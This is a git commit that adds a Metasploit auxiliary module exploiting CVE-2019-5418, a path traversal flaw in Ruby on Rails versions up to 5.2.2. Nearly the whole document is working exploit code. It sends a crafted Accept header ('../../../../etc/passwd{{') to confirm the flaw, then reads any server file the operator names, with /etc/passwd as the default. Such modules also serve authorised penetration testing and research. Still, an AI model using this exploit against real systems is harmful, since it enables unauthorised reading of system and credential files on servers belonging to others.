Add Rails Doubletap module

master
cbrnrd 2019-03-27 11:02:08 -06:00
parent 1981e9be0c
commit 5fc0422897
1 changed files with 93 additions and 0 deletions

View File

@ -0,0 +1,93 @@
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(
update_info(
info,
'Name' => 'Ruby On Rails File Content Disclosure (\'doubletap\')',
'Description' => %q{
This module uses a path traversal vulnerablity in Ruby on Rails
versions =< 5.2.2 to read files on a target server.
},
'Author' =>
[
'Carter Brainerd <0xCB@protonmail.com>', # Metasploit module
'John Hawthorn <john@hawthorn.email>' # PoC/discovery
],
'License' => MSF_LICENSE,
'References' => [
[ 'URL', 'https://hackerone.com/reports/473888' ],
[ 'URL', 'https://github.com/mpgn/Rails-doubletap-RCE' ],
[ 'URL', 'https://groups.google.com/forum/#!topic/rubyonrails-security/pFRKI96Sm8Q' ],
[ 'CVE', '2019-5418']
]
)
)
register_options(
[
Opt::RPORT(80),
OptString.new('ROUTE', [true, 'A route on the vulnerable server.', '/msf']),
OptString.new('TARGET_FILE', [true, 'The absolute path of remote file to read.', '/etc/passwd'])
]
)
end
def check
# Check if target file is absolute path
unless datastore['TARGET_FILE'][0] == '/'
print_error "TARGET_FILE must be an absolute path (eg. /etc/passwd)."
return false
end
# Fire off the request
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(datastore['ROUTE']),
'headers' => { 'Accept' => "../../../../../../../../../../etc/passwd{{"} # What is this, the 90s?
})
if res.nil?
print_error "Request timed out."
return false
end
if res.body.include? 'root:x:0:0:root:'
print_good 'Target is vulnerable!'
return true
else
print_error 'Target is not vulnerable.'
return false
end
end
def run
unless check
print_error "Check did not pass, exiting."
return
end
print_status "Requesting file #{datastore['TARGET_FILE']}"
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(datastore['ROUTE']),
'headers' => { 'Accept' => "../../../../../../../../../..#{datastore['TARGET_FILE']}{{"}
})
if res.nil?
print_error "Request timed out."
return
end
print_status "Response from server:"
print_line res.body.to_s
end
end